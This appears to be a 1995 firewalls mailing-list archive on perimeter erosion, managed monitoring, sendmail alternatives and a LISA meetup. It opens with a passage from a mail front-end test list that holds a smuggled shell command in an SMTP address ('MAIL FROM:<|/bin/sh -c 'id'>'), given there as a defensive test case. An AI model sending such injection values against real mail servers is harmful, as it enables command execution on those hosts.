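    "RCPT TO:<bob@example.net>",
    "DATA",
    "Subject: hello",
    "",
    "..leading dot survives dot-stuffing",
    ".",
    "MAIL FROM:<|/bin/sh -c 'id'>",
    "RCPT TO:<bob@example.net>",
]
```

The value of this arrangement is what the front end does not do: it never executes anything, never consults aliases or a configuration language, and refuses rather than normalises an address it does not understand. That keeps it small enough to read in one sitting, which is the property the large MTA behind it cannot offer; the operating-system-level isolation Rick describes is what limits the damage when the front end itself turns out to have a bug.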
From firewalls-owner Wed Sep 13 17:30:07 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA13927 for firewalls-outgoing; Wed, 13 Sep 1995 17:12:29 -0700
Received: from switchblade.iwi.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA13920 for ; Wed, 13 Sep 1995 17:12:25 -0700
Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id UAA16397 for firewalls@greatcircle.com; Wed, 13 Sep 1995 20:34:55 -0400
From: "Marcus J. Ranum"
Message-Id: <199509140034.UAA16397@switchblade.iwi.com>
Subject: Firewall off Mortal Kombat XIV
To: firewalls@greatcircle.com
Date: Wed, 13 Sep 1995 20:34:55 -0400 (EDT)
Reply-To: mjr@iwi.com
Organization: Information Warehouse! Inc, Baltimore, MD
URL: mjr's web page
Phone: 410-889-8569
Coredump: Infocalypse Now!!!
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Content-Length: 2506
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>By JONATHAN STANDING
>c.1995 Bloomberg Business News
>
>TOKYO -- Sega Enterprises Ltd. will sell products that allow users of its
>Saturn video game player to dial into the Internet network, a feature that
>could be the first step toward worldwide interactive video games.
[...]

I've been wondering when the first DOOM proxies would be implemented, but
*THIS* is really something!! Apparently the unit will be available with a
modem that will do dial-on-demand IP.

The next step that will doubtless occur to some rocket scientist is to have
the machines dynamically download pay-per-game code to eliminate those
silly ROM cartridges, and then comes the whole billing problem.

These kinds of things keep pointing me back to the basic problems I
believe we (the security dweebs of the world) are going to face in the
next 5 years:

1) The notion of "network perimeter" will erode to the point where saying
"protect all access into and out of your network" will be greeted with
hysterical giggles.
Right now when I say that many of my customers just look at me with a
glazed eyed expression as if to say, "pull the other one."

2) IPV6 will not save us. I don't expect that all the new IP-based toaster
ovens, Sega machines, and clock radios are going to talk V6. By the time V6
actually exists, the installed base will be too large to replace. To help
get your brain around the problem, consider the reaction if someone
suggested that the US change over to 220 volt European power grids.

3) The number of new network-aware and IP-aware apps is now on an
exponential growth curve. Consider, for a moment, how the typical network
app is developed today:
	Version 1: no security
	Version 2: security? next version
	Version 3: something lame
With the increase in network-permeation, the actual number of things that
"get it right" will be close to zero.

4) I used to worry that the government's myopic views on cryptography were
going to keep us from building good high-integrity APIs and tools into our
infrastructure. Now I realize I was naive: it is *TOO* *LATE* to fix it; it
has gotten too big.

What does this all mean? It may mean that there's good job security in
being a computer professional. It may mean that someone is going to look
at the situation and announce that we have no clothes. I *HOPE* it means
that someone will begin to think of new computer security paradigms. Who
knows what they will be? I don't think we're going to win the war the way
it's going.

mjr.
From firewalls-owner Wed Sep 13 18:00:03 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA14700 for firewalls-outgoing; Wed, 13 Sep 1995 17:40:15 -0700
Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA14692 for ; Wed, 13 Sep 1995 17:40:11 -0700
Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA09453; Wed, 13 Sep 95 19:59:05 CDT
Received: by mnbp.network.com with Microsoft Mail id <3057799E@mnbp.network.com>; Wed, 13 Sep 95 19:38:54 CDT
From: Craig McLellan
To: firewalls
Subject: Does anyone do remote monitoring
Date: Wed, 13 Sep 95 19:36:00 CDT
Message-Id: <3057799E@mnbp.network.com>
Encoding: 5 TEXT
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I have a customer who is looking for any firms that provide remote security
monitoring. Anyone know of this???

RGRDS....clm

From firewalls-owner Wed Sep 13 18:02:43 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA15088 for firewalls-outgoing; Wed, 13 Sep 1995 17:55:31 -0700
Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA15079 for ; Wed, 13 Sep 1995 17:55:16 -0700
Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA09592; Wed, 13 Sep 95 20:14:04 CDT
Received: by mnbp.network.com with Microsoft Mail id <30577D22@mnbp.network.com>; Wed, 13 Sep 95 19:53:54 CDT
From: Craig McLellan
To: firewalls
Subject: RE: Firewall off Mortal Kombat XIV
Date: Wed, 13 Sep 95 19:52:00 CDT
Message-Id: <30577D22@mnbp.network.com>
Encoding: 72 TEXT
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

As far as I know we've been firewalling DOOM since DOOM was released. We
could firewall any game off a net.

RGRDS....clm
Network Systems Corp.
Try WWW.NETWORK.COM

----------
----------------------------------------------------------------------------
--
>By JONATHAN STANDING
>c.1995 Bloomberg Business News
>
>TOKYO -- Sega Enterprises Ltd. will sell products that allow users of its
>Saturn video game player to dial into the Internet network, a feature that
>could be the first step toward worldwide interactive video games.
[...]

I've been wondering when the first DOOM proxies would be implemented, but
*THIS* is really something!! Apparently the unit will be available with a
modem that will do dial-on-demand IP.

The next step that will doubtless occur to some rocket scientist is to have
the machines dynamically download pay-per-game code to eliminate those
silly ROM cartridges, and then comes the whole billing problem.

These kinds of things keep pointing me back to the basic problems I
believe we (the security dweebs of the world) are going to face in the
next 5 years:

1) The notion of "network perimeter" will erode to the point where saying
"protect all access into and out of your network" will be greeted with
hysterical giggles. Right now when I say that many of my customers just
look at me with a glazed eyed expression as if to say, "pull the other
one."

2) IPV6 will not save us. I don't expect that all the new IP-based toaster
ovens, Sega machines, and clock radios are going to talk V6. By the time V6
actually exists, the installed base will be too large to replace. To help
get your brain around the problem, consider the reaction if someone
suggested that the US change over to 220 volt European power grids.

3) The number of new network-aware and IP-aware apps is now on an
exponential growth curve. Consider, for a moment, how the typical network
app is developed today:
	Version 1: no security
	Version 2: security? next version
	Version 3: something lame
With the increase in network-permeation, the actual number of things that
"get it right" will be close to zero.
4) I used to worry that the government's myopic views on cryptography were
going to keep us from building good high-integrity APIs and tools into our
infrastructure. Now I realize I was naive: it is *TOO* *LATE* to fix it; it
has gotten too big.

What does this all mean? It may mean that there's good job security in
being a computer professional. It may mean that someone is going to look
at the situation and announce that we have no clothes. I *HOPE* it means
that someone will begin to think of new computer security paradigms. Who
knows what they will be? I don't think we're going to win the war the way
it's going.

mjr.

From firewalls-owner Wed Sep 13 18:30:15 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA15642 for firewalls-outgoing; Wed, 13 Sep 1995 18:13:45 -0700
Received: from upgrade.com (upgrade.com [199.174.17.53]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA15630 for ; Wed, 13 Sep 1995 18:13:40 -0700
Received: from upgrade.com ([127.0.0.1]) by upgrade.com (8.6.12/8.6.12) with ESMTP id VAA14094; Wed, 13 Sep 1995 21:11:07 -0400
Message-Id: <199509140111.VAA14094@upgrade.com>
To: mjr@iwi.com
cc: firewalls@GreatCircle.COM
Subject: Re: Firewall off Mortal Kombat XIV
In-reply-to: Your message of "Wed, 13 Sep 1995 20:34:55 EDT." <199509140034.UAA16397@switchblade.iwi.com>
Date: Wed, 13 Sep 1995 21:11:06 -0400
From: Christopher Nielsen
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 13 Sep 1995 20:34:55 -0400 (EDT) "Marcus J. Ranum" wrote:
--------
[snip]
>> 3) The number of new network-aware and IP-aware apps is
>> now on an exponential growth curve. Consider, for a moment,
>> how the typical network app is developed today:
>> Version 1: no security
>> Version 2: security? next version
>> Version 3: something lame
>> With the increase in network-permeation, the actual number
>> of things that "get it right" will be close to zero.
I see this with the developers at my place of employment. They write
network apps that have to run as root because they've hardwired it that
way. The apps have all kinds of neat bells and whistles, but contain some
very basic but serious security bugs. I've tried to put together a list of
secure programming guidelines because I don't have time to verify all the
code that these guys produce, but that seems to me to be only a kludge. I
have numerous stories of confrontations with security-clueless developers
and managers, but I'm sure we all have those. =)

>> What does this all mean? It may mean that there's good
>> job security in being a computer professional. It may mean that
>> someone is going to look at the situation and announce that we
>> have no clothes. I *HOPE* it means that someone will begin to
>> think of new computer security paradigms. Who knows what they
>> will be? I don't think we're going to win the war the way it's
>> going.

As it stands, it seems to me that we are barely keeping ahead of the
security game. I definitely agree that we won't win the war if we keep
this up. People need to wake up to the facts, but it seems to take a
disaster or crisis before they do so. It can be very frustrating when
people won't listen to you because they think they're right; I had that
problem with one of the CIOs yesterday. My present solution is to just do
my job and don't give up the fight. Even if that means beating my head
against the management wall until my forehead bleeds.
-Chris

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Christopher Nielsen                     UCA&L
System and Network Administrator        Buffalo, New York
(nielsenc@upgrade.com)
#include

From firewalls-owner Wed Sep 13 19:32:43 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA17491 for firewalls-outgoing; Wed, 13 Sep 1995 19:16:11 -0700
Received: from westie.mid.net (ns1.mid.net [198.247.250.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA17483 for ; Wed, 13 Sep 1995 19:16:08 -0700
Received: from gaijin.mid.net (gaijin.mid.net [198.247.250.28]) by westie.mid.net (8.6.10/8.6.9) with ESMTP id VAA15329; Wed, 13 Sep 1995 21:14:49 -0500
Received: (from alan@localhost) by gaijin.mid.net (8.6.10/8.6.9) id VAA18437; Wed, 13 Sep 1995 21:14:52 -0500
From: Alan Hannan
Message-Id: <199509140214.VAA18437@gaijin.mid.net>
Subject: Re: Does anyone do remote monitoring
To: mclelcl@onto.network.com (Craig McLellan)
Date: Wed, 13 Sep 1995 21:14:52 -0500 (CDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <3057799E@mnbp.network.com> from "Craig McLellan" at Sep 13, 95 07:36:00 pm
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 624
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

......... Craig McLellan is rumored to have said:
]
]
] I have a customer who is looking for any firms that provide remote security
] monitoring. Anyone know of this???

Sometime ago, BBN planet announced a product that sounds very similar to
what you are speaking of. As well, MIDnet offers firewall monitoring with
our SecurIt firewall as a value-added service.
--
Alan Hannan                         Email: alan@mid.net
Network Systems Administrator       Voice: (402) 472-0239
MIDnet, Lincoln NOC Office          Fax:   (402) 472-0240

"The only way to make a man trustworthy is to trust him" - Henry Stimson

From firewalls-owner Wed Sep 13 19:36:52 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA17455 for firewalls-outgoing; Wed, 13 Sep 1995 19:14:58 -0700
Received: from westie.mid.net (westie.mid.net [198.247.250.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA17447 for ; Wed, 13 Sep 1995 19:14:53 -0700
Received: from gaijin.mid.net (gaijin.mid.net [198.247.250.28]) by westie.mid.net (8.6.10/8.6.9) with ESMTP id VAA15320; Wed, 13 Sep 1995 21:13:36 -0500
Received: (from alan@localhost) by gaijin.mid.net (8.6.10/8.6.9) id VAA18427; Wed, 13 Sep 1995 21:13:39 -0500
From: Alan Hannan
Message-Id: <199509140213.VAA18427@gaijin.mid.net>
Subject: Re: Firewall off Mortal Kombat XIV
To: mjr@iwi.com
Date: Wed, 13 Sep 1995 21:13:38 -0500 (CDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <199509140034.UAA16397@switchblade.iwi.com> from "Marcus J. Ranum" at Sep 13, 95 08:34:55 pm
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 5990
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

wire> By JONATHAN STANDING
wire> c.1995 Bloomberg Business News
wire>
wire> TOKYO -- Sega Enterprises Ltd. will sell products that allow users of its
wire> Saturn video game player to dial into the Internet network, a feature that
wire> could be the first step toward worldwide interactive video games.

mjr> implemented, but *THIS* is really something!! Apparently the unit
mjr> will be available with a modem that will do dial-on-demand IP.
mjr> The next step that will doubtless occur to some rocket scientist
mjr> is to have the machines dynamically download pay-per-game code
mjr> to eliminate those silly ROM cartridges, and then comes the whole
mjr> billing problem.

This is already done with the Sega channel, no? Only the medium is
different. My, I wish I had time to experiment with this sort of thing.. ;)

Speaking of billing problems, anyone read your
comp.protocols.tcp-ip.domains lately?

mjr> 1) The notion of "network perimeter" will erode to the point
mjr> where saying "protect all access into and out of your network"
mjr> will be greeted with hysterical giggles. Right now when I
mjr> say that many of my customers just look at me with a glazed
mjr> eyed expression as if to say, "pull the other one."

I believe a larger issue here is the responsibility of the company or
employer to provide access for the workforce to the internet. While many
of my customers insist on unfettered and unbreakable security being
delivered (which is, of course, undeliverable at this time), a majority
understand that the security-convenience tradeoff is significant.
Therefore, their users make do without promiscuous access, as the funding
party [who happens to be the employer] makes the rules.

My point, I don't see that as prevalent, though it does happen. As well,
why does the employer owe them this access? Often the management adopts a
mature approach, and while they know they must "trade", they know they
don't have to "surf".

mjr> 2) IPV6 will not save us. I don't expect that all the new
mjr> IP-based toaster ovens, Sega machines, and clock radios
mjr> are going to talk V6. By the time V6 actually exists, the
mjr> installed base will be too large to replace. To help get
mjr> your brain around the problem, consider the reaction if
mjr> someone suggested that the US change over to 220 volt
mjr> European power grids.

Imagine Hannan-Ranum Enterprises Inc.
develops a $400 gadget that allows one's home to carry both 110 and 220
volt power, regardless of the source from the power company. This allows
people to migrate to the new toasters which use 220 volt power.

Also, we develop a $300 gadget that, when affixed to transformers, allows
them to carry both 110 and 220 volt current without the potential
problems.

Now we have a supply side (power grid / Internet) duality, as well as a
demand side (homes / internal network) duality that allows us to continue
our exponential growth more comfortably. This is where the ipV6 and
downwards compatible routers could take us.

mjr> 3) The number of new network-aware and IP-aware apps is
mjr> now on an exponential growth curve. Consider, for a moment,
mjr> how the typical network app is developed today:
mjr> Version 1: no security
mjr> Version 2: security? next version
mjr> Version 3: something lame
mjr> With the increase in network-permeation, the actual number
mjr> of things that "get it right" will be close to zero.

Perhaps, but the wonderful tools you've developed allow one to coexist
with these silly applications. I mean that sincerely. The ease of
transition for networks using transparent proxies is, in my opinion, a
*Very Good Thing* (tm). As well, the security imparted to the internal
network is at least that of the preceding, non-transparent proxy firewall.

mjr> 4) I used to worry that the government's myopic views
mjr> on cryptography were going to keep us from building good
mjr> high-integrity APIs and tools into our infrastructure.
mjr> Now I realize I was naive: it is *TOO* *LATE* to fix it;
mjr> it has gotten too big.

I don't follow you. Do you mean to imply that there are too many installed
base apps that to hope to consolidate them into a securely communicating
network is impossible? That the current network and install cost are too
great to contemplate? You said it yourself, the systems are growing
exponentially, there will never be as few as there are now.
This reminds me of the decision of the mid-80's to maintain backwards
compatibility for 8086 in all 80x86, on the basis that there was too large
of an installed base.

mjr> What does this all mean? It may mean that there's good
mjr> job security in being a computer professional.

And perhaps more in being a computer security professional....

mjr> It may mean that
mjr> someone is going to look at the situation and announce that we
mjr> have no clothes.

That would take someone naive enough to not be entranced in the
established paradigm. Perhaps Microsoft? :)

mjr> I *HOPE* it means that someone will begin to think of new computer
mjr> security paradigms. Who knows what they will be? I don't think we're
mjr> going to win the war the way it's going.

That depends what our definition of victory is. If your definition is to
prevent all but minuscule access from the internal network to the world,
then yes, we'll lose. If your goal is to protect integrity/etc while
allowing fluent access, I think I'll be on the winning side.

--

BTW - Those going to LISA/USENIX (that's you marcus) - what say you about
organizing our own Beer/BOF at some time? Perhaps we all pile into my
rented regal and raise security-hell at some local bar. Let me know if
you're interested.
--
Alan Hannan                         Email: alan@mid.net
Network Systems Administrator       Voice: (402) 472-0239
MIDnet, Lincoln NOC Office          Fax:   (402) 472-0240

"The only way to make a man trustworthy is to trust him" - Henry Stimson

From firewalls-owner Wed Sep 13 21:00:07 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA20645 for firewalls-outgoing; Wed, 13 Sep 1995 20:42:15 -0700
Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA20638 for ; Wed, 13 Sep 1995 20:42:12 -0700
Received: from sousa.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0st5AL-0001fRC; Wed, 13 Sep 95 20:40 PDT
Received: by sousa.amdahl.com (Smail3.1.28.1 #4) id m0st58V-0003oMC; Wed, 13 Sep 95 20:38 PDT
Message-Id:
From: jgt10@amdahl.com (John G. Thompson)
Subject: Re: Secure version of Sendmail
To: smith@sctc.com (Rick Smith)
Date: Wed, 13 Sep 1995 20:38:50 -0700 (PDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <199509131728.MAA20468@shade.sctc.com> from "Rick Smith" at Sep 13, 95 12:28:59 pm
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Content-Length: 490
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> ..Sendmail is the only useful mail package out there. I'd be happy
> to adopt anything which offers me Sendmail functionality in a more secure
> fashion....

Have you honestly looked at smail?

JGT
--
John G. Thompson        jgt10@amdahl.com        1-408-992-2088
Amdahl Corporation, P.O. Box 3470 MS 383, Sunnyvale, CA 94088-3470
[The opinions expressed are MINE. They do not necessarily reflect the
policies, procedures, press releases or opinions of the Amdahl Corporation.]
From firewalls-owner Wed Sep 13 21:02:43 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA20423 for firewalls-outgoing; Wed, 13 Sep 1995 20:34:03 -0700
Received: from suntan.tandem.com (suntan.tandem.com [192.216.221.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA20416 for ; Wed, 13 Sep 1995 20:33:59 -0700
Received: from adm.loc201.tandem.com.loc201.tandem.com by suntan.tandem.com (8.6.12/suntan5.950313) id UAA00182; Wed, 13 Sep 1995 20:32:37 -0700
Received: from vern.loc201.tandem.com by adm.loc201.tandem.com.loc201.tandem.com (4.1/6main.940209) id AA01832; Wed, 13 Sep 95 20:32:37 PDT
Received: by vern.loc201.tandem.com (4.1/6leaf.940209) id AA10351; Wed, 13 Sep 95 20:32:36 PDT
Date: Wed, 13 Sep 95 20:32:36 PDT
Message-Id: <9509140332.AA10351@vern.loc201.tandem.com>
To: mclelcl@onto.network.com
Subject: Re: Does anyone do remote monitoring
Cc: firewalls@greatcircle.com
From: pat@tandem.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Alan Hannan writes:
> ......... Craig McLellan is rumored to have said:
> ]
> ]
> ] I have a customer who is looking for any firms that provide remote security
> ] monitoring. Anyone know of this???
>
> Sometime ago, BBN planet announced a product that sounds very similar to
> what you are speaking of. As well, MIDnet offers firewall monitoring with
> our SecurIt firewall as a value-added service.
>

Here is the BBN Planet stuff:

-pat
--
Patrick Mulrooney
Tandem Computers

---------
BBN Internet Site Patrol

No matter how complex your networking environment, your organization needs
a reliable way to protect its electronic assets. BBN Planet Internet Site
Patrol(SM) provides both the resources and expertise to improve network
security and thwart network intruders so you can keep sensitive corporate
information and mission-critical data private and still take full
advantage of the Internet.
Keeping electronic assets safe

Most organizations using the Internet know they need to improve their
security measures, but what does that really mean? The answer is complex
because each organization uses the Internet differently. That's why BBN
Planet developed the Internet Site Patrol, the industry's only affordable,
professionally managed and monitored Internet security service. Internet
Site Patrol tailors a combination of hardware, software, and services to
provide exactly the level of network security your organization
needs--from denying unauthorized external access to limiting access
internally.

A unique managed firewall service

Through the BBN Internet Site Patrol, BBN Planet builds and manages a
unique protective firewall between your network and the Internet--and then
guards that boundary against intruders around the clock, 365 days a year.
Only BBN Planet proactively manages your connection and provides timely
and appropriate response to security and system events, including
emergency disconnects.

The firewall provides multiple layers of defense against intrusion,
allowing internal users access to the Internet, while prohibiting
unauthorized inbound connections. Connected to your external router, the
firewall is configured to filter and perform other routing functions that
foil certain types of attacks. Since all traffic between your internal
network and the Internet is routed through the Internet Site Patrol
system, only authorized traffic is allowed to pass through.

BBN Planet: Your partner in Internet security

More than an ordinary security service, the Internet Site Patrol system
provides the resources and expertise of BBN Planet in a partnership to
improve your network's security. Not only does the Internet Site Patrol
system offer training of security liaisons, it provides updates on changes
in Internet security and offers enhanced services in response to customer
feedback.
In addition to the Internet Site Patrol system, BBN Planet provides
customized network consulting and implementation services to meet all of
your internetworking needs.

Highlights

 * Continuous, automated remote monitoring 24 hours a day
 * Superior detection to minimize the risks of a break-in
 * Turnkey solution--a complete service with firewall hardware, software,
   installation, configuration, integration, management, monitoring, and
   updates
 * Timely and appropriate response to security and system events,
   including emergency disconnect
 * Comprehensive logging of firewall system activity
 * Monthly reports summarizing significant system and security events

Specifications

 * Multiple layers of defense:
   o Firewall filter and routing
   o Bastion host firewall and application-level gateway with
     authentication, authorization, monitoring, and logging capabilities
   o Choke router backup to bastion host
 * Application-level Internet relays:
   o TELNET interactive log-in facility that allows users to access other
     computers on the Internet
   o File Transfer Protocol (FTP) that allows users to copy files from
     other computers on the Internet
   o Simple Mail Transport Protocol (SMTP) that provides electronic mail
     capabilities
   o Secondary Domain Name Service (DNS) for Internet host-to-address
     mapping
   o NNTP protocol that relays Internet newsgroups to an internal news
     server
   o HTTP protocol that allows access to multimedia information on the
     World Wide Web

From firewalls-owner Wed Sep 13 23:02:43 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA23168 for firewalls-outgoing; Wed, 13 Sep 1995 22:33:42 -0700
Received: from cs.columbia.edu (cs.columbia.edu [128.59.16.20]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA23161 for ; Wed, 13 Sep 1995 22:33:39 -0700
Received: from ground.cs.columbia.edu (ground.cs.columbia.edu [128.59.10.3]) by cs.columbia.edu (8.6.12/8.6.6) with ESMTP id XAA26908; Wed, 13 Sep 1995 23:45:41 -0400
Received: (from ji@localhost) by ground.cs.columbia.edu (8.6.12/8.6.6) id BAA16689; Thu, 14 Sep 1995 01:32:21 -0400
Date: Thu, 14 Sep 1995 01:32:21 -0400
Message-Id: <199509140532.BAA16689@ground.cs.columbia.edu>
From: John Ioannidis
To: mah@ic.co.at
CC: firewalls@greatcircle.com
In-reply-to: (message from Michael Haberler on Wed, 13 Sep 1995 23:11:55 -0100 (GMT-0100))
Subject: Re: IP source routed traffic - how to generate?
Reply-To: ji@cs.columbia.edu
Organization: Columbia University Department of Computer Science
X-Date: 28 Fructidor An CCIII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Just RTFM for setsockopt() to set the source route to use.

/ji

From firewalls-owner Wed Sep 13 23:07:39 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA23396 for firewalls-outgoing; Wed, 13 Sep 1995 22:46:37 -0700
Received: from hermes.intel.com (hermes.intel.com [143.183.152.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA23389 for ; Wed, 13 Sep 1995 22:46:34 -0700
Received: from argus.intel.com by hermes.intel.com (5.65/10.0i); Wed, 13 Sep 95 22:45:18 -0700
Received: by argus.intel.com (5.65/10.0i); Wed, 13 Sep 95 22:45:17 -0700
From: sedayao@argus.intel.com (Jeffrey C. Sedayao)
Message-Id: <9509140545.AA18498@argus.intel.com>
Subject: firewall BOF at LISA/USENIX?
To: alan@mid.net (Alan Hannan)
Date: Wed, 13 Sep 95 22:45:16 PDT
Cc: mjr@iwi.com, firewalls@greatcircle.com
In-Reply-To: <199509140213.VAA18427@gaijin.mid.net> from "Alan Hannan" at Sep 13, 95 09:13:38 pm
X-Mailer: ELM [version 2.4dev PL66]
Mime-Version: 1.0
Content-Type: text
Content-Length: 775
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

[much deleted]
> BTW - Those going to LISA/USENIX (that's you marcus) - what say you about
> organizing our own Beer/BOF at some time? Perhaps we all pile into my
> rented regal and raise security-hell at some local bar. Let me know if you're
> interested.
Is there going to be a formal firewall BOF there at LISA/USENIX? If so,
when (day and time) will it be? If nothing formal, then a Beer/BOF would
do, depending on when it would be.

> --
> Alan Hannan                         Email: alan@mid.net
> Network Systems Administrator       Voice: (402) 472-0239
> MIDnet, Lincoln NOC Office          Fax:   (402) 472-0240
>
> "The only way to make a man trustworthy is to trust him" - Henry Stimson
>

--
Jeff Sedayao
Intel Corporation
sedayao@argus.intel.com

From firewalls-owner Thu Sep 14 00:02:53 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA24828 for firewalls-outgoing; Wed, 13 Sep 1995 23:42:27 -0700
Received: from hermes.intel.com (hermes.intel.com [143.183.152.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id XAA24820 for ; Wed, 13 Sep 1995 23:42:23 -0700
Received: from argus.intel.com by hermes.intel.com (5.65/10.0i); Wed, 13 Sep 95 23:41:08 -0700
Received: by argus.intel.com (5.65/10.0i); Wed, 13 Sep 95 23:41:07 -0700
From: sedayao@argus.intel.com (Jeffrey C. Sedayao)
Message-Id: <9509140641.AA18659@argus.intel.com>
Subject: Re: Firewall off Mortal Kombat XIV
To: mjr@iwi.com
Date: Wed, 13 Sep 95 23:41:06 PDT
Cc: firewalls@greatcircle.com
In-Reply-To: <199509140034.UAA16397@switchblade.iwi.com> from "Marcus J. Ranum" at Sep 13, 95 08:34:55 pm
X-Mailer: ELM [version 2.4dev PL66]
Mime-Version: 1.0
Content-Type: text
Content-Length: 4456
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

[stuff deleted]
> problems I believe we (the security dweebs of the world) are going
> to face in the next 5 years:
> 1) The notion of "network perimeter" will erode to the point
> where saying "protect all access into and out of your network"
> will be greeted with hysterical giggles. Right now when I
> say that many of my customers just look at me with a glazed
> eyed expression as if to say, "pull the other one."

I agree.
It is getting easier and easier for holes to be punched through a large
corporate "network perimeter". In my opinion (and unfortunate experience),
insiders are probably the ones who will do the hole punching.

> 2) IPV6 will not save us. I don't expect that all the new
> IP-based toaster ovens, Sega machines, and clock radios
> are going to talk V6. By the time V6 actually exists, the
> installed base will be too large to replace. To help get
> your brain around the problem, consider the reaction if
> someone suggested that the US change over to 220 volt
> European power grids.
> 3) The number of new network-aware and IP-aware apps is
> now on an exponential growth curve. Consider, for a moment,
> how the typical network app is developed today:
> Version 1: no security
> Version 2: security? next version
> Version 3: something lame
> With the increase in network-permeation, the actual number
> of things that "get it right" will be close to zero.

It would probably take a number of drastic problems with a few network
apps (like injuries or deaths or massive financial loss) before people get
really serious about getting security into apps.

> 4) I used to worry that the government's myopic views
> on cryptography were going to keep us from building good
> high-integrity APIs and tools into our infrastructure.
> Now I realize I was naive: it is *TOO* *LATE* to fix it;
> it has gotten too big.
> What does this all mean? It may mean that there's good
> job security in being a computer professional. It may mean that
> someone is going to look at the situation and announce that we
> have no clothes. I *HOPE* it means that someone will begin to
> think of new computer security paradigms. Who knows what they
> will be? I don't think we're going to win the war the way it's
> going.

I would say that events above will force the following:

1. Instead of relying on one big network perimeter in an organization,
there will evolve many different ones and multiple layers of perimeters.
There will be an outer one, and several perimeters around various critical components. This is analogous to the multilayered physical security some large companies have. The company headquarters will have physical barriers outside of its entrance to prevent crude attacks like a car bomb attack. To get inside of the building, you will need a badge or other token. Within that building, there will be several secured areas that are limited to people with passcodes, keys, or specific other tokens. Firewalls (or network perimeters) will be in multiple places and in multiple levels within the organization. In other words, organizations will no longer grow to be "crunchy on the outside but soft on the inside". They will become crunchy on the outside, soft in some places inside, but also crunchy again in certain places on the inside.

2. Individual applications and hosts will become more hardened and secure. For old applications, small individual sized "firewall-wrappers" will become available. As the network perimeter erodes, it has to erode to the point of individual hosts or applications (or sets of hosts and applications). So hosts will either become secure or have some kind of secure wrapper/firewall. I like to think of the analogy of a filing cabinet. If you can't lock it, put it in a room that you can lock. If you can lock it, you can put it in a room that also can be locked.

3. Enlightened companies will provide decent Internet access not only as a competitive measure, but as a way to ensure that its employees don't run off and create their own Internet access in a highly insecure and risky manner. As Brent has pointed out, if people need Net access to get their job done, they are probably going to find a way to get Net access. It's better for a company to do the Internet access job right instead of having employees construct some risky, insecure kluge.

> mjr.
--
Jeff Sedayao
Intel Corporation
sedayao@argus.intel.com

From firewalls-owner Thu Sep 14 01:00:07 1995
From: blymn@awadi.com.AU (Brett Lymn)
Message-Id: <9509140739.AA11688@bunya.awadi>
Subject: Re: MVS religious war, was MVS vs the world
To: zen@flying.fish.com (d)
Date: Thu, 14 Sep 1995 17:09:52 +0930 (CST)
Cc: firewalls@greatcircle.com
In-Reply-To: <199509132153.OAA21435@flying.fish.com> from "d" at Sep 13, 95 02:53:43 pm

According to d:
>
>Ahem. Surely you mean:
>

Aww c'mon - you should sort the list so the fanatics can find their entry (though, for some it would not matter from what I have seen...)

    for $OS (sort keys %list_of_OS) {
        print "$OS people will defend $list_of_OS{$OS} operating system...\n";
    }

--
